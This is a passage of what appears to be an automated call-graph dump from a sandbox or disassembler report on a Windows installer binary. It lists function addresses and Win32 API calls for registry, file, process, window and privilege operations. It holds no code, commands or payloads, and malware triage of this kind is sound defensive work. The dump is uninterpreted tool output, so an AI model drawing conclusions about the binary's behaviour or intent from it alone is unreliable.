402bce 17 API calls 4167->4168 4169 40217c 4168->4169 4170 402bce 17 API calls 4169->4170 4171 402186 4170->4171 4172 402bce 17 API calls 4171->4172 4173 402193 4172->4173 4174 402bce 17 API calls 4173->4174 4175 40219d 4174->4175 4176 4021df CoCreateInstance 4175->4176 4177 402bce 17 API calls 4175->4177 4180 4021fe 4176->4180 4182 4022ac 4176->4182 4177->4176 4178 401423 24 API calls 4179 4022e2 4178->4179 4181 40228c MultiByteToWideChar 4180->4181 4180->4182 4181->4182 4182->4178 4182->4179 4183 4022eb 4184 402bce 17 API calls 4183->4184 4185 4022f1 4184->4185 4186 402bce 17 API calls 4185->4186 4187 4022fa 4186->4187 4188 402bce 17 API calls 4187->4188 4189 402303 4188->4189 4190 406448 2 API calls 4189->4190 4191 40230c 4190->4191 4192 402310 4191->4192 4193 40231d lstrlenA lstrlenA 4191->4193 4195 4051fb 24 API calls 4192->4195 4197 402318 4192->4197 4194 4051fb 24 API calls 4193->4194 4196 402359 SHFileOperationA 4194->4196 4195->4197 4196->4192 4196->4197 4198 40236d 4199 402387 4198->4199 4200 402374 4198->4200 4201 406167 17 API calls 4200->4201 4202 402381 4201->4202 4203 4057f0 MessageBoxIndirectA 4202->4203 4203->4199 4204 40266d 4205 402bac 17 API calls 4204->4205 4207 402677 4205->4207 4206 405ce5 ReadFile 4206->4207 4207->4206 4208 4026e7 4207->4208 4210 4026f7 4207->4210 4211 4026e5 4207->4211 4213 406032 wsprintfA 4208->4213 4210->4211 4212 40270d SetFilePointer 4210->4212 4212->4211 4213->4211 4214 4019ed 4215 402bce 17 API calls 4214->4215 4216 4019f4 4215->4216 4217 402bce 17 API calls 4216->4217 4218 4019fd 4217->4218 4219 401a04 lstrcmpiA 4218->4219 4220 401a16 lstrcmpA 4218->4220 4221 401a0a 4219->4221 4220->4221 4222 40296e 4223 402bac 17 API calls 4222->4223 4224 402974 4223->4224 4225 4029af 4224->4225 4226 4027bf 4224->4226 4228 402986 4224->4228 4225->4226 4227 406167 17 API calls 4225->4227 4227->4226 4228->4226 4230 406032 wsprintfA 4228->4230 4230->4226 3623 40156f 3624 401586 3623->3624 3625 40157f ShowWindow 3623->3625 3626 401594 ShowWindow 3624->3626 3627 402a5a 3624->3627 3625->3624 3626->3627 4231 40516f 4232 405193 4231->4232 4233 40517f 4231->4233 4234 40519b IsWindowVisible 4232->4234 4238 4051b2 4232->4238 4235 405185 4233->4235 4236 4051dc 4233->4236 4234->4236 4237 4051a8 4234->4237 4240 4041a4 SendMessageA 4235->4240 4239 4051e1 CallWindowProcA 4236->4239 4241 404aab 5 API calls 4237->4241 4238->4239 4243 404b2b 4 API calls 4238->4243 4242 40518f 4239->4242 4240->4242 4241->4238 4243->4236 4244 4014f4 SetForegroundWindow 4245 402a5a 4244->4245 3628 402476 3629 402bce 17 API calls 3628->3629 3630 402488 3629->3630 3631 402bce 17 API calls 3630->3631 3632 402492 3631->3632 3645 402c5e 3632->3645 3635 402a5a 3636 4024c7 3638 4024d3 3636->3638 3640 402bac 17 API calls 3636->3640 3637 402bce 17 API calls 3639 4024c0 lstrlenA 3637->3639 3641 4024f5 RegSetValueExA 3638->3641 3642 4030d8 31 API calls 3638->3642 3639->3636 3640->3638 3643 40250b RegCloseKey 3641->3643 3642->3641 3643->3635 3646 402c79 3645->3646 3649 405f88 3646->3649 3650 405f97 3649->3650 3651 405fa2 RegCreateKeyExA 3650->3651 3652 4024a2 3650->3652 3651->3652 3652->3635 3652->3636 3652->3637 4246 402777 4247 40277d 4246->4247 4248 402781 FindNextFileA 4247->4248 4251 402793 4247->4251 4249 4027d2 4248->4249 4248->4251 4252 4060d4 lstrcpynA 4249->4252 4252->4251 4253 401ef9 4254 402bce 17 API calls 4253->4254 4255 401eff 4254->4255 4256 402bce 17 API calls 4255->4256 4257 401f08 4256->4257 4258 402bce 17 API calls 4257->4258 4259 401f11 4258->4259 4260 402bce 17 API calls 4259->4260 4261 401f1a 4260->4261 4262 401423 24 API calls 4261->4262 4263 401f21 4262->4263 4270 4057b6 ShellExecuteExA 4263->4270 4265 401f5c 4266 406552 5 API calls 4265->4266 4268 4027bf 4265->4268 4267 401f76 CloseHandle 4266->4267 4267->4268 4270->4265 3756 401f7b 3757 402bce 17 API calls 3756->3757 3758 401f81 3757->3758 3759 4051fb 24 API calls 3758->3759 3760 401f8b 3759->3760 3761 405773 2 API calls 3760->3761 3762 401f91 3761->3762 3763 401fb2 CloseHandle 3762->3763 3767 4027bf 3762->3767 3771 406552 WaitForSingleObject 3762->3771 3763->3767 3766 401fa6 3768 401fb4 3766->3768 3769 401fab 3766->3769 3768->3763 3776 406032 wsprintfA 3769->3776 3772 40656c 3771->3772 3773 40657e GetExitCodeProcess 3772->3773 3774 406519 2 API calls 3772->3774 3773->3766 3775 406573 WaitForSingleObject 3774->3775 3775->3772 3776->3763 4271 401ffb 4272 402bce 17 API calls 4271->4272 4273 402002 4272->4273 4274 4064dd 5 API calls 4273->4274 4275 402011 4274->4275 4276 402029 GlobalAlloc 4275->4276 4277 402091 4275->4277 4276->4277 4278 40203d 4276->4278 4279 4064dd 5 API calls 4278->4279 4280 402044 4279->4280 4281 4064dd 5 API calls 4280->4281 4282 40204e 4281->4282 4282->4277 4286 406032 wsprintfA 4282->4286 4284 402085 4287 406032 wsprintfA 4284->4287 4286->4284 4287->4277 4288 4018fd 4289 401934 4288->4289 4290 402bce 17 API calls 4289->4290 4291 401939 4290->4291 4292 40589c 67 API calls 4291->4292 4293 401942 4292->4293 4294 401cfe 4295 402bac 17 API calls 4294->4295 4296 401d04 IsWindow 4295->4296 4297 401a0e 4296->4297 4298 401000 4299 401037 BeginPaint GetClientRect 4298->4299 4300 40100c DefWindowProcA 4298->4300 4301 4010f3 4299->4301 4303 401179 4300->4303 4304 401073 CreateBrushIndirect FillRect DeleteObject 4301->4304 4305 4010fc 4301->4305 4304->4301 4306 401102 CreateFontIndirectA 4305->4306 4307 401167 EndPaint 4305->4307 4306->4307 4308 401112 6 API calls 4306->4308 4307->4303 4308->4307 4309 401900 4310 402bce 17 API calls 4309->4310 4311 401907 4310->4311 4312 4057f0 MessageBoxIndirectA 4311->4312 4313 401910 4312->4313 4314 401502 4315 40150a 4314->4315 4317 40151d 4314->4317 4316 402bac 17 API calls 4315->4316 4316->4317 3059 403c84 3060 403dd7 3059->3060 3061 403c9c 3059->3061 3063 403e28 3060->3063 3064 403de8 GetDlgItem GetDlgItem 3060->3064 3061->3060 3062 403ca8 3061->3062 3066 403cb3 SetWindowPos 3062->3066 3067 403cc6 3062->3067 3065 403e82 3063->3065 3073 401389 2 API calls 3063->3073 3068 404158 18 API calls 3064->3068 3074 403dd2 3065->3074 3130 4041a4 3065->3130 3066->3067 3070 403ce3 3067->3070 3071 403ccb ShowWindow 3067->3071 3072 403e12 SetClassLongA 3068->3072 3075 403d05 3070->3075 3076 403ceb DestroyWindow 3070->3076 3071->3070 3077 40140b 2 API calls 3072->3077 3078 403e5a 3073->3078 3080 403d0a SetWindowLongA 3075->3080 3081 403d1b 3075->3081 3079 4040e1 3076->3079 3077->3063 3078->3065 3084 403e5e SendMessageA 3078->3084 3079->3074 3090 404112 ShowWindow 3079->3090 3080->3074 3082 403dc4 3081->3082 3083 403d27 GetDlgItem 3081->3083 3152 4041bf 3082->3152 3087 403d57 3083->3087 3088 403d3a SendMessageA IsWindowEnabled 3083->3088 3084->3074 3085 40140b 2 API calls 3097 403e94 3085->3097 3086 4040e3 DestroyWindow KiUserCallbackDispatcher 3086->3079 3092 403d64 3087->3092 3093 403dab SendMessageA 3087->3093 3094 403d77 3087->3094 3104 403d5c 3087->3104 3088->3074 3088->3087 3090->3074 3091 406167 17 API calls 3091->3097 3092->3093 3092->3104 3093->3082 3098 403d94 3094->3098 3099 403d7f 3094->3099 3096 403d92 3096->3082 3097->3074 3097->3085 3097->3086 3097->3091 3100 404158 18 API calls 3097->3100 3121 404023 DestroyWindow 3097->3121 3133 404158 3097->3133 3101 40140b 2 API calls 3098->3101 3146 40140b 3099->3146 3100->3097 3103 403d9b 3101->3103 3103->3082 3103->3104 3149 404131 3104->3149 3106 403f0f GetDlgItem 3107 403f24 3106->3107 3108 403f2c ShowWindow KiUserCallbackDispatcher 3106->3108 3107->3108 3136 40417a KiUserCallbackDispatcher 3108->3136 3110 403f56 EnableWindow 3115 403f6a 3110->3115 3111 403f6f GetSystemMenu EnableMenuItem SendMessageA 3112 403f9f SendMessageA 3111->3112 3111->3115 3112->3115 3115->3111 3137 40418d SendMessageA 3115->3137 3138 403c65 3115->3138 3141 4060d4 lstrcpynA 3115->3141 3117 403fce lstrlenA 3118 406167 17 API calls 3117->3118 3119 403fdf SetWindowTextA 3118->3119 3142 401389 3119->3142 3121->3079 3122 40403d CreateDialogParamA 3121->3122 3122->3079 3123 404070 3122->3123 3124 404158 18 API calls 3123->3124 3125 40407b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3124->3125 3126 401389 2 API calls 3125->3126 3127 4040c1 3126->3127 3127->3074 3128 4040c9 ShowWindow 3127->3128 3129 4041a4 SendMessageA 3128->3129 3129->3079 3131 4041bc 3130->3131 3132 4041ad SendMessageA 3130->3132 3131->3097 3132->3131 3134 406167 17 API calls 3133->3134 3135 404163 SetDlgItemTextA 3134->3135 3135->3106 3136->3110 3137->3115 3139 406167 17 API calls 3138->3139 3140 403c73 SetWindowTextA 3139->3140 3140->3115 3141->3117 3144 401390 3142->3144 3143 4013fe 3143->3097 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3147 401389 2 API calls 3146->3147 3148 401420 3147->3148 3148->3104 3150 404138 3149->3150 3151 40413e SendMessageA 3149->3151 3150->3151 3151->3096 3153 404282 3152->3153 3154 4041d7 GetWindowLongA 3152->3154 3153->3074 3154->3153 3155 4041ec 3154->3155 3155->3153 3156 404219 GetSysColor 3155->3156 3157 40421c 3155->3157 3156->3157 3158 404222 SetTextColor 3157->3158 3159 40422c SetBkMode 3157->3159 3158->3159 3160 404244 GetSysColor 3159->3160 3161 40424a 3159->3161 3160->3161 3162 404251 SetBkColor 3161->3162 3163 40425b 3161->3163 3162->3163 3163->3153 3164 404275 CreateBrushIndirect 3163->3164 3165 40426e DeleteObject 3163->3165 3164->3153 3165->3164 4318 402604 4319 402bce 17 API calls 4318->4319 4320 40260b 4319->4320 4323 405c6d GetFileAttributesA CreateFileA 4320->4323 4322 402617 4323->4322 4324 401b87 4325 401b94 4324->4325 4326 401bd8 4324->4326 4331 401bab 4325->4331 4334 401c1c 4325->4334 4327 401c01 GlobalAlloc 4326->4327 4328 401bdc 4326->4328 4330 406167 17 API calls 4327->4330 4336 402387 4328->4336 4345 4060d4 lstrcpynA 4328->4345 4329 406167 17 API calls 4332 402381 4329->4332 4330->4334 4343 4060d4 lstrcpynA 4331->4343 4339 4057f0 MessageBoxIndirectA 4332->4339 4334->4329 4334->4336 4337 401bee GlobalFree 4337->4336 4338 401bba 4344 4060d4 lstrcpynA 4338->4344 4339->4336 4341 401bc9 4346 4060d4 lstrcpynA 4341->4346 4343->4338 4344->4341 4345->4337 4346->4336 3545 402588 3557 402c0e 3545->3557 3548 402bac 17 API calls 3549 40259b 3548->3549 3550 4025a9 3549->3550 3555 4027bf 3549->3555 3551 4025c2 RegEnumValueA 3550->3551 3552 4025b6 RegEnumKeyA 3550->3552 3553 4025de RegCloseKey 3551->3553 3554 4025d7 3551->3554 3552->3553 3553->3555 3554->3553 3558 402bce 17 API calls 3557->3558 3559 402c25 3558->3559 3560 405f5a RegOpenKeyExA 3559->3560 3561 402592 3560->3561 3561->3548 3562 40380d 3563 403825 3562->3563 3564 403817 CloseHandle 3562->3564 3569 403852 3563->3569 3564->3563 3570 403860 3569->3570 3571 40382a 3570->3571 3572 403865 FreeLibrary GlobalFree 3570->3572 3573 40589c 3571->3573 3572->3571 3572->3572 3574 405b5a 18 API calls 3573->3574 3575 4058bc 3574->3575 3576 4058c4 DeleteFileA 3575->3576 3577 4058db 3575->3577 3605 403836 3576->3605 3578 405a09 3577->3578 3610 4060d4 lstrcpynA 3577->3610 3583 406448 2 API calls 3578->3583 3578->3605 3580 405901 3581 405914 3580->3581 3582 405907 lstrcatA 3580->3582 3585 405ab3 2 API calls 3581->3585 3584 40591a 3582->3584 3586 405a2d 3583->3586 3587 405928 lstrcatA 3584->3587 3588 405933 lstrlenA FindFirstFileA 3584->3588 3585->3584 3589 405a6c 3 API calls 3586->3589 3586->3605 3587->3588 3588->3578 3593 405957 3588->3593 3591 405a37 3589->3591 3590 405a97 CharNextA 3590->3593 3592 405854 5 API calls 3591->3592 3594 405a43 3592->3594 3593->3590 3598 4059e8 FindNextFileA 3593->3598 3606 40589c 60 API calls 3593->3606 3607 4051fb 24 API calls 3593->3607 3608 4051fb 24 API calls 3593->3608 3609 405eb3 36 API calls 3593->3609 3611 4060d4 lstrcpynA 3593->3611 3612 405854 3593->3612 3595 405a47 3594->3595 3596 405a5d 3594->3596 3601 4051fb 24 API calls 3595->3601 3595->3605 3597 4051fb 24 API calls 3596->3597 3597->3605 3598->3593 3600 405a00 FindClose 3598->3600 3600->3578 3602 405a54 3601->3602 3604 405eb3 36 API calls 3602->3604 3604->3605 3606->3593 3607->3598 3608->3593 3609->3593 3610->3580 3611->3593 3620 405c48 GetFileAttributesA 3612->3620 3615 405881 3615->3593 3616 405877 DeleteFileA 3618 40587d 3616->3618 3617 40586f RemoveDirectoryA 3617->3618 3618->3615 3619 40588d SetFileAttributesA 3618->3619 3619->3615 3621 405860 3620->3621 3622 405c5a SetFileAttributesA 3620->3622 3621->3615 3621->3616 3621->3617 3622->3621 4347 40428e lstrcpynA lstrlenA 4348 401490 4349 4051fb 24 API calls 4348->4349 4350 401497 4349->4350 3653 402516 3654 402c0e 17 API calls 3653->3654 3655 402520 3654->3655 3656 402bce 17 API calls 3655->3656 3657 402529 3656->3657 3658 402533 RegQueryValueExA 3657->3658 3662 4027bf 3657->3662 3659 402553 3658->3659 3663 402559 RegCloseKey 3658->3663 3659->3663 3664 406032 wsprintfA 3659->3664 3663->3662 3664->3663 3801 40239c 3802 4023a4 3801->3802 3804 4023aa 3801->3804 3803 402bce 17 API calls 3802->3803 3803->3804 3805 4023ba 3804->3805 3806 402bce 17 API calls 3804->3806 3807 4023c8 3805->3807 3808 402bce 17 API calls 3805->3808 3806->3805 3809 402bce 17 API calls 3807->3809 3808->3807 3810 4023d1 WritePrivateProfileStringA 3809->3810 3811 40159d 3812 402bce 17 API calls 3811->3812 3813 4015a4 SetFileAttributesA 3812->3813 3814 4015b6 3813->3814 4351 40149d 4352 402387 4351->4352 4353 4014ab PostQuitMessage 4351->4353 4353->4352 4354 40209d 4355 40215d 4354->4355 4356 4020af 4354->4356 4358 401423 24 API calls 4355->4358 4357 402bce 17 API calls 4356->4357 4359 4020b6 4357->4359 4365 4022e2 4358->4365 4360 402bce 17 API calls 4359->4360 4361 4020bf 4360->4361 4362 4020d4 LoadLibraryExA 4361->4362 4363 4020c7 GetModuleHandleA 4361->4363 4362->4355 4364 4020e4 GetProcAddress 4362->4364 4363->4362 4363->4364 4366 402130 4364->4366 4367 4020f3 4364->4367 4368 4051fb 24 API calls 4366->4368 4369 401423 24 API calls 4367->4369 4370 402103 4367->4370 4368->4370 4369->4370 4370->4365 4371 402151 FreeLibrary 4370->4371 4371->4365 4372 401a1e 4373 402bce 17 API calls 4372->4373 4374 401a27 ExpandEnvironmentStringsA 4373->4374 4375 401a3b 4374->4375 4377 401a4e 4374->4377 4376 401a40 lstrcmpA 4375->4376 4375->4377 4376->4377 3815 40171f 3816 402bce 17 API calls 3815->3816 3817 401726 SearchPathA 3816->3817 3818 401741 3817->3818 4383 401d1f 4384 402bac 17 API calls 4383->4384 4385 401d26 4384->4385 4386 402bac 17 API calls 4385->4386 4387 401d32 GetDlgItem 4386->4387 4388 402620 4387->4388 4389 402421 4390 402453 4389->4390 4391 402428 4389->4391 4392 402bce 17 API calls 4390->4392 4393 402c0e 17 API calls 4391->4393 4395 40245a 4392->4395 4394 40242f 4393->4394 4397 402bce 17 API calls 4394->4397 4399 402467 4394->4399 4400 402c8c 4395->4400 4398 402440 RegDeleteValueA RegCloseKey 4397->4398 4398->4399 4401 402c98 4400->4401 4402 402c9f 4400->4402 4401->4399 4402->4401 4404 402cd0 4402->4404 4405 405f5a RegOpenKeyExA 4404->4405 4407 402cfe 4405->4407 4406 402da8 4406->4401 4407->4406 4408 402d0e RegEnumValueA 4407->4408 4412 402d31 4407->4412 4409 402d98 RegCloseKey 4408->4409 4408->4412 4409->4406 4410 402d6d RegEnumKeyA 4411 402d76 RegCloseKey 4410->4411 4410->4412 4413 4064dd 5 API calls 4411->4413 4412->4409 4412->4410 4412->4411 4414 402cd0 6 API calls 4412->4414 4415 402d86 4413->4415 4414->4412 4415->4406 4416 402d8a RegDeleteKeyA 4415->4416 4416->4406 4417 4027a1 4418 402bce 17 API calls 4417->4418 4419 4027a8 FindFirstFileA 4418->4419 4420 4027cb 4419->4420 4424 4027bb 4419->4424 4422 4027d2 4420->4422 4425 406032 wsprintfA 4420->4425 4426 4060d4 lstrcpynA 4422->4426 4425->4422 4426->4424 4427 4045a3 4428 4045b3 4427->4428 4429 4045d9 4427->4429 4430 404158 18 API calls 4428->4430 4431 4041bf 8 API calls 4429->4431 4432 4045c0 SetDlgItemTextA 4430->4432 4433 4045e5 4431->4433 4432->4429 3177 403325 SetErrorMode GetVersion 3178 403366 3177->3178 3179 40336c 3177->3179 3180 4064dd 5 API calls 3178->3180 3267 40646f GetSystemDirectoryA 3179->3267 3180->3179 3182 403382 lstrlenA 3182->3179 3183 403391 3182->3183 3270 4064dd GetModuleHandleA 3183->3270 3186 4064dd 5 API calls 3187 40339f 3186->3187 3188 4064dd 5 API calls 3187->3188 3189 4033ab #17 OleInitialize SHGetFileInfoA 3188->3189 3276 4060d4 lstrcpynA 3189->3276 3192 4033f7 GetCommandLineA 3277 4060d4 lstrcpynA 3192->3277 3194 403409 3195 405a97 CharNextA 3194->3195 3196 403432 CharNextA 3195->3196 3199 403442 3196->3199 3197 40350c 3198 40351f GetTempPathA 3197->3198 3278 4032f4 3198->3278 3199->3197 3199->3199 3204 405a97 CharNextA 3199->3204 3208 40350e 3199->3208 3201 403537 3202 403591 DeleteFileA 3201->3202 3203 40353b GetWindowsDirectoryA lstrcatA 3201->3203 3288 402ea1 GetTickCount GetModuleFileNameA 3202->3288 3205 4032f4 12 API calls 3203->3205 3204->3199 3207 403557 3205->3207 3207->3202 3211 40355b GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3207->3211 3372 4060d4 lstrcpynA 3208->3372 3209 4035a5 3212 40363f ExitProcess CoUninitialize 3209->3212 3216 40362b 3209->3216 3217 405a97 CharNextA 3209->3217 3215 4032f4 12 API calls 3211->3215 3213 403773 3212->3213 3214 403655 3212->3214 3219 4037f5 ExitProcess 3213->3219 3220 40377b GetCurrentProcess OpenProcessToken 3213->3220 3389 4057f0 3214->3389 3221 403589 3215->3221 3316 4038e7 3216->3316 3224 4035c0 3217->3224 3227 4037c6 3220->3227 3228 403796 LookupPrivilegeValueA AdjustTokenPrivileges 3220->3228 3221->3202 3221->3212 3223 40363b 3223->3212 3230 403606 3224->3230 3231 40366b 3224->3231 3229 4064dd 5 API calls 3227->3229 3228->3227 3232 4037cd 3229->3232 3373 405b5a 3230->3373 3393 40575b 3231->3393 3235 4037e2 ExitWindowsEx 3232->3235 3236 4037ee 3232->3236 3235->3219 3235->3236 3239 40140b 2 API calls 3236->3239 3239->3219 3240 403681 lstrcatA 3241 40368c lstrcatA lstrcmpiA 3240->3241 3241->3212 3242 4036a8 3241->3242 3244 4036b4 3242->3244 3245 4036ad 3242->3245 3401 40573e CreateDirectoryA 3244->3401 3396 4056c1 CreateDirectoryA 3245->3396 3246 403620 3388 4060d4 lstrcpynA 3246->3388 3250 4036b9 SetCurrentDirectoryA 3252 4036d3 3250->3252 3253 4036c8 3250->3253 3405 4060d4 lstrcpynA 3252->3405 3404 4060d4 lstrcpynA 3253->3404 3256 406167 17 API calls 3257 403712 DeleteFileA 3256->3257 3258 40371f CopyFileA 3257->3258 3264 4036e1 3257->3264 3258->3264 3259 403767 3260 405eb3 36 API calls 3259->3260 3262 40376e 3260->3262 3262->3212 3263 406167 17 API calls 3263->3264 3264->3256 3264->3259 3264->3263 3266 403753 CloseHandle 3264->3266 3406 405eb3 MoveFileExA 3264->3406 3410 405773 CreateProcessA 3264->3410 3266->3264 3268 406491 wsprintfA LoadLibraryExA 3267->3268 3268->3182 3271 406503 GetProcAddress 3270->3271 3272 4064f9 3270->3272 3274 403398 3271->3274 3273 40646f 3 API calls 3272->3273 3275 4064ff 3273->3275 3274->3186 3275->3271 3275->3274 3276->3192 3277->3194 3279 4063af 5 API calls 3278->3279 3280 403300 3279->3280 3281 40330a 3280->3281 3413 405a6c lstrlenA CharPrevA 3280->3413 3281->3201 3284 40573e 2 API calls 3285 403318 3284->3285 3416 405c9c 3285->3416 3420 405c6d GetFileAttributesA CreateFileA 3288->3420 3290 402ee1 3309 402ef1 3290->3309 3421 4060d4 lstrcpynA 3290->3421 3292 402f07 3422 405ab3 lstrlenA 3292->3422 3296 402f18 GetFileSize 3297 403012 3296->3297 3315 402f2f 3296->3315 3427 402e3d 3297->3427 3299 40301b 3301 40304b GlobalAlloc 3299->3301 3299->3309 3462 4032dd SetFilePointer 3299->3462 3438 4032dd SetFilePointer 3301->3438 3302 40307e 3306 402e3d 6 API calls 3302->3306 3305 403066 3439 4030d8 3305->3439 3306->3309 3307 403034 3310 4032c7 ReadFile 3307->3310 3309->3209 3312 40303f 3310->3312 3311 402e3d 6 API calls 3311->3315 3312->3301 3312->3309 3313 403072 3313->3309 3313->3313 3314 4030af SetFilePointer 3313->3314 3314->3309 3315->3297 3315->3302 3315->3309 3315->3311 3459 4032c7 3315->3459 3317 4064dd 5 API calls 3316->3317 3318 4038fb 3317->3318 3319 403901 3318->3319 3320 403913 3318->3320 3498 406032 wsprintfA 3319->3498 3321 405fbb 3 API calls 3320->3321 3323 40393e 3321->3323 3324 40395c lstrcatA 3323->3324 3326 405fbb 3 API calls 3323->3326 3325 403911 3324->3325 3483 403bac 3325->3483 3326->3324 3329 405b5a 18 API calls 3330 40398e 3329->3330 3331 403a17 3330->3331 3333 405fbb 3 API calls 3330->3333 3332 405b5a 18 API calls 3331->3332 3334 403a1d 3332->3334 3335 4039ba 3333->3335 3336 403a2d LoadImageA 3334->3336 3337 406167 17 API calls 3334->3337 3335->3331 3340 4039d6 lstrlenA 3335->3340 3343 405a97 CharNextA 3335->3343 3338 403ad3 3336->3338 3339 403a54 RegisterClassA 3336->3339 3337->3336 3342 40140b 2 API calls 3338->3342 3341 403a8a SystemParametersInfoA CreateWindowExA 3339->3341 3371 403add 3339->3371 3344 4039e4 lstrcmpiA 3340->3344 3345 403a0a 3340->3345 3341->3338 3346 403ad9 3342->3346 3348 4039d4 3343->3348 3344->3345 3349 4039f4 GetFileAttributesA 3344->3349 3347 405a6c 3 API calls 3345->3347 3350 403bac 18 API calls 3346->3350 3346->3371 3351 403a10 3347->3351 3348->3340 3352 403a00 3349->3352 3353 403aea 3350->3353 3499 4060d4 lstrcpynA 3351->3499 3352->3345 3355 405ab3 2 API calls 3352->3355 3356 403af6 ShowWindow 3353->3356 3357 403b79 3353->3357 3355->3345 3359 40646f 3 API calls 3356->3359 3491 4052cd OleInitialize 3357->3491 3361 403b0e 3359->3361 3360 403b7f 3362 403b83 3360->3362 3363 403b9b 3360->3363 3364 403b1c GetClassInfoA 3361->3364 3366 40646f 3 API calls 3361->3366 3369 40140b 2 API calls 3362->3369 3362->3371 3365 40140b 2 API calls 3363->3365 3367 403b30 GetClassInfoA RegisterClassA 3364->3367 3368 403b46 DialogBoxParamA 3364->3368 3365->3371 3366->3364 3367->3368 3370 40140b 2 API calls 3368->3370 3369->3371 3370->3371 3371->3223 3372->3198 3501 4060d4 lstrcpynA 3373->3501 3375 405b6b 3502 405b05 CharNextA CharNextA 3375->3502 3378 403611 3378->3212 3387 4060d4 lstrcpynA 3378->3387 3379 4063af 5 API calls 3385 405b81 3379->3385 3380 405bac lstrlenA 3381 405bb7 3380->3381 3380->3385 3383 405a6c 3 API calls 3381->3383 3384 405bbc GetFileAttributesA 3383->3384 3384->3378 3385->3378 3385->3380 3386 405ab3 2 API calls 3385->3386 3508 406448 FindFirstFileA 3385->3508 3386->3380 3387->3246 3388->3216 3390 405805 3389->3390 3391 403663 ExitProcess 3390->3391 3392 405819 MessageBoxIndirectA 3390->3392 3392->3391 3394 4064dd 5 API calls 3393->3394 3395 403670 lstrcatA 3394->3395 3395->3240 3395->3241 3397 405712 GetLastError 3396->3397 3398 4036b2 3396->3398 3397->3398 3399 405721 SetFileSecurityA 3397->3399 3398->3250 3399->3398 3400 405737 GetLastError 3399->3400 3400->3398 3402 405752 GetLastError 3401->3402 3403 40574e 3401->3403 3402->3403 3403->3250 3404->3252 3405->3264 3407 405ed4 3406->3407 3408 405ec7 3406->3408 3407->3264 3511 405d43 3408->3511 3411 4057b2 3410->3411 3412 4057a6 CloseHandle 3410->3412 3411->3264 3412->3411 3414 403312 3413->3414 3415 405a86 lstrcatA 3413->3415 3414->3284 3415->3414 3417 405ca7 GetTickCount GetTempFileNameA 3416->3417 3418 403323 3417->3418 3419 405cd4 3417->3419 3418->3201 3419->3417 3419->3418 3420->3290 3421->3292 3423 405ac0 3422->3423 3424 402f0d 3423->3424 3425 405ac5 CharPrevA 3423->3425 3426 4060d4 lstrcpynA 3424->3426 3425->3423 3425->3424 3426->3296 3428 402e46 3427->3428 3429 402e5e 3427->3429 3430 402e56 3428->3430 3431 402e4f DestroyWindow 3428->3431 3432 402e66 3429->3432 3433 402e6e GetTickCount 3429->3433 3430->3299 3431->3430 3463 406519 3432->3463 3435 402e7c CreateDialogParamA ShowWindow 3433->3435 3436 402e9f 3433->3436 3435->3436 3436->3299 3438->3305 3440 4030ee 3439->3440 3441 40311c 3440->3441 3480 4032dd SetFilePointer 3440->3480 3442 4032c7 ReadFile 3441->3442 3444 403127 3442->3444 3445 403260 3444->3445 3446 403139 GetTickCount 3444->3446 3448 40324a 3444->3448 3447 4032a2 3445->3447 3452 403264 3445->3452 3446->3448 3455 403165 3446->3455 3449 4032c7 ReadFile 3447->3449 3448->3313 3449->3448 3450 4032c7 ReadFile 3450->3455 3451 4032c7 ReadFile 3451->3452 3452->3448 3452->3451 3453 405d14 WriteFile 3452->3453 3453->3452 3454 4031bb GetTickCount 3454->3455 3455->3448 3455->3450 3455->3454 3456 4031e0 MulDiv wsprintfA 3455->3456 3478 405d14 WriteFile 3455->3478 3467 4051fb 3456->3467 3481 405ce5 ReadFile 3459->3481 3462->3307 3464 406536 PeekMessageA 3463->3464 3465 402e6c 3464->3465 3466 40652c DispatchMessageA 3464->3466 3465->3299 3466->3464 3468 405216 3467->3468 3477 4052b9 3467->3477 3469 405233 lstrlenA 3468->3469 3470 406167 17 API calls 3468->3470 3471 405241 lstrlenA 3469->3471 3472 40525c 3469->3472 3470->3469 3473 405253 lstrcatA 3471->3473 3471->3477 3474 405262 SetWindowTextA 3472->3474 3475 40526f 3472->3475 3473->3472 3474->3475 3476 405275 SendMessageA SendMessageA SendMessageA 3475->3476 3475->3477 3476->3477 3477->3455 3479 405d32 3478->3479 3479->3455 3480->3441 3482 4032da 3481->3482 3482->3315 3484 403bc0 3483->3484 3500 406032 wsprintfA 3484->3500 3486 403c31 3487 403c65 18 API calls 3486->3487 3489 403c36 3487->3489 3488 40396c 3488->3329 3489->3488 3490 406167 17 API calls 3489->3490 3490->3489 3492 4041a4 SendMessageA 3491->3492 3493 4052f0 3492->3493 3496 401389 2 API calls 3493->3496 3497 405317 3493->3497 3494 4041a4 SendMessageA 3495 405329 OleUninitialize 3494->3495 3495->3360 3496->3493 3497->3494 3498->3325 3499->3331 3500->3486 3501->3375 3503 405b20 3502->3503 3505 405b30 3502->3505 3504 405b2b CharNextA 3503->3504 3503->3505 3507 405b50 3504->3507 3506 405a97 CharNextA 3505->3506 3505->3507 3506->3505 3507->3378 3507->3379 3509 406469 3508->3509 3510 40645e FindClose 3508->3510 3509->3385 3510->3509 3512 405d69 3511->3512 3513 405d8f GetShortPathNameA 3511->3513 3538 405c6d GetFileAttributesA CreateFileA 3512->3538 3515 405da4 3513->3515 3516 405eae 3513->3516 3515->3516 3518 405dac wsprintfA 3515->3518 3516->3407 3517 405d73 CloseHandle GetShortPathNameA 3517->3516 3519 405d87 3517->3519 3520 406167 17 API calls 3518->3520 3519->3513 3519->3516 3521 405dd4 3520->3521 3539 405c6d GetFileAttributesA CreateFileA 3521->3539 3523 405de1 3523->3516 3524 405df0 GetFileSize GlobalAlloc 3523->3524 3525 405e12 3524->3525 3526 405ea7 CloseHandle 3524->3526 3527 405ce5 ReadFile 3525->3527 3526->3516 3528 405e1a 3527->3528 3528->3526 3540 405bd2 lstrlenA 3528->3540 3531 405e31 lstrcpyA 3533 405e53 3531->3533 3532 405e45 3534 405bd2 4 API calls 3532->3534 3535 405e8a SetFilePointer 3533->3535 3534->3533 3536 405d14 WriteFile 3535->3536 3537 405ea0 GlobalFree 3536->3537 3537->3526 3538->3517 3539->3523 3541 405c13 lstrlenA 3540->3541 3542 405c1b 3541->3542 3543 405bec lstrcmpiA 3541->3543 3542->3531 3542->3532 3543->3542 3544 405c0a CharNextA 3543->3544 3544->3541 4434 4038a5 4435 4038b0 4434->4435 4436 4038b4 4435->4436 4437 4038b7 GlobalAlloc 4435->4437 4437->4436 4438 402626 4439 40262b 4438->4439 4440 40263f 4438->4440 4441 402bac 17 API calls 4439->4441 4442 402bce 17 API calls 